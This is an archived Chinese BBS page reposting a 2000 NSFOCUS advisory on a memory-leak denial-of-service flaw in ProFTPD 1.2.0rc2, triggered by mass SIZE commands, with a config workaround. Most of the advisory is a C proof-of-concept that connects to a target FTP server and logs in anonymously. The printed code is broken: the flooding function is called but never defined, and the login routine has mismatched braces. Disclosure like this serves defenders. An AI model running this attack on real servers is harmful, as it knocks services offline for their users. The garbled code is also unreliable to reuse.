📄 213.htm
字号:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm非常精华下载</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center"> ● UNIX网络编程 (BM: clown) </font></big></big></td></tr>
<tr>
<td width="68%" height="44" bgcolor="#000000"><font face="黑体"><big><big><p align="center"></big></big><a href="http://cterm.163.net"><img src="banner.gif" width="400" height="60" alt="banner.gif"border="0"></a></font></td>
</tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">回到开始</a>][<a href="196.htm">上一层</a>][<a href="214.htm">下一篇</a>]
<hr><p align="left"><small>:发信人: radium (雷电), 信区: Security <br>
:标 题: [nsfocus] [漏洞] Proftpd 内存泄漏拒绝服 <br>
:发信站: 武汉白云黄鹤站 (Thu Dec 21 17:49:12 2000), 站内信件 <br>
-------------------------- eGroups Sponsor -------------------------~-~> <br>
<br>
eGroups eLerts <br>
<br>
It's Easy. It's Fun. Best of All, it's Free! <br>
<br>
http://click.egroups.com/1/9698/0/_/_/_/977388073/ <br>
<br>
---------------------------------------------------------------------_-> <br>
<br>
发布日期: 2000-12-21 <br>
<br>
<br>
<br>
更新日期: 2000-12-21 <br>
<br>
受影响的系统: <br>
<br>
proftd-1.2.0rc2(可能所有的proftpd都受此问题影响) <br>
<br>
<br>
<br>
<br>
描述: <br>
<br>
---------------------------------------------------------------------- <br>
<br>
<br>
<br>
Proftpd是一个流行的Ftp服务软件。它在执行SIZE命令时存在一个内存泄漏的 <br>
<br>
问题,攻击者可以利用此问题进行拒绝服务攻击。 <br>
<br>
如果执行5000条SIZE命令,将导致系统占用300KB内存。如果执行大量的SIZE <br>
<br>
命令,将使内存耗尽,导致拒绝服务攻击。攻击者只需要匿名访问权限即可 <br>
<br>
进行这种攻击。 <br>
<br>
<*来源:Wojciech Purczynski (wp@elzabsoft.pl) <br>
<br>
Piotr Zurawski [fb] (szur@ix.renet.pl) <br>
<br>
<br>
*> <br>
<br>
<br>
<br>
测试程序: <br>
<br>
---------------------------------------------------------------------- <br>
<br>
<br>
<br>
警 告 <br>
<br>
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! <br>
<br>
<br>
<br>
/* Proftpd DoS <br>
<br>
* by Piotr Zurawski (szur@ix.renet.pl) <br>
<br>
* This source is just an example of memory leakage in proftpd-1.2.0 <br>
<br>
<br>
(rc2) <br>
<br>
* server discovered by Wojciech Purczynski. <br>
<br>
*/ <br>
<br>
#include <stdio.h> <br>
<br>
#include <unistd.h> <br>
<br>
#include <stdlib.h> <br>
<br>
#include <signal.h> <br>
<br>
#include <time.h> <br>
<br>
#include <string.h> <br>
<br>
#include <ctype.h> <br>
<br>
#include <sys/types.h> <br>
<br>
<br>
#include <sys/socket.h> <br>
<br>
#include <netinet/in.h> <br>
<br>
#include <arpa/inet.h> <br>
<br>
#include <arpa/nameser.h> <br>
<br>
#include <netdb.h> <br>
<br>
#define USERNAME "anonymous" <br>
<br>
#define PASSWORD "dupa@dupa.pl" <br>
<br>
#define HOWMANY 10000 <br>
<br>
void logintoftp(); <br>
<br>
void sendsizes(); <br>
<br>
int fd; <br>
<br>
<br>
struct in_addr host; <br>
<br>
unsigned short port = 21; <br>
<br>
int tcp_connect(struct in_addr addr,unsigned short port); <br>
<br>
int main(int argc, char **argv) <br>
<br>
{ <br>
<br>
if (!resolve(argv[1],&host)) <br>
<br>
{ <br>
<br>
fprintf(stderr,"Hostname lookup failure\n"); <br>
<br>
exit(0); <br>
<br>
} <br>
<br>
fd=tcp_connect(host,port); <br>
<br>
<br>
logintoftp(fd); <br>
<br>
printf("Logged\n"); <br>
<br>
sendsizes(fd); <br>
<br>
printf("Now check out memory usage of proftpd daemon"); <br>
<br>
printf("Resident set size (RSS) and virtual memory size (VSIZE)"); <br>
<br>
printf("fields in ps output"); <br>
<br>
} <br>
<br>
void logintoftp() <br>
<br>
{ <br>
<br>
char snd[1024], rcv[1024]; <br>
<br>
int n; <br>
<br>
<br>
printf("Logging " USERNAME "/" PASSWORD "\r\n"); <br>
<br>
memset(snd, '\0', 1024); <br>
<br>
sprintf(snd, "USER %s\r\n", USERNAME); <br>
<br>
write(fd, snd, strlen(snd)); <br>
<br>
while((n=read(fd, rcv, sizeof(rcv))) > 0) <br>
<br>
{ <br>
<br>
rcv[n] = 0; <br>
<br>
if(strchr(rcv, '\n') != NULL)break; <br>
<br>
return; <br>
<br>
} <br>
<br>
int tcp_connect(struct in_addr addr,unsigned short port) <br>
<br>
<br>
{ <br>
<br>
int fd; <br>
<br>
struct sockaddr_in serv; <br>
<br>
bzero(&serv,sizeof(serv)); serv.sin_addr=addr; <br>
<br>
serv.sin_port=htons(port); <br>
<br>
serv.sin_family=AF_INET; <br>
<br>
if ((fd=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP)) < 0)\ <br>
<br>
{ <br>
<br>
perror("socket"); <br>
<br>
exit(0); <br>
<br>
} <br>
<br>
<br>
if (connect(fd,(struct sockaddr *)&serv,sizeof(serv)) < 0) <br>
<br>
{ <br>
<br>
perror("connect"); <br>
<br>
exit(0); <br>
<br>
} <br>
<br>
return(fd); <br>
<br>
} <br>
<br>
int resolve(char *hostname,struct in_addr *addr) <br>
<br>
{ <br>
<br>
struct hostent *res; <br>
<br>
res=gethostbyname(hostname); <br>
<br>
<br>
if (res==NULL) <br>
<br>
return(0); <br>
<br>
memcpy((char *)addr,res->h_addr,res->h_length); <br>
<br>
return(1); <br>
<br>
} <br>
<br>
<br>
<br>
-------------------------------------------------------------------- <br>
<br>
建议: <br>
<br>
临时解决方法: <br>
<br>
Dmitry Alyabyev <dimitry@al.org.ua>提供了一个临时解决 <br>
<br>
方法,限制SIZE命令的使用,在配置文件中增加下列语句: <br>
<br>
<Limit SIZE> <br>
<br>
Deny All <br>
<br>
</Limit> <br>
<br>
<br>
<br>
厂商补丁: <br>
<br>
暂无。 <br>
<br>
中联绿盟翻译整理,未经许可,不得转载 <br>
<br>
欢迎访问我们的站点http://www.nsfocus.com/ <br>
<br>
</small><hr>
<p align="center">[<a href="index.htm">回到开始</a>][<a href="196.htm">上一层</a>][<a href="214.htm">下一篇</a>]
<p align="center"><a href="http://cterm.163.net">欢迎访问Cterm主页</a></p>
</table>
</body>
</html>⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -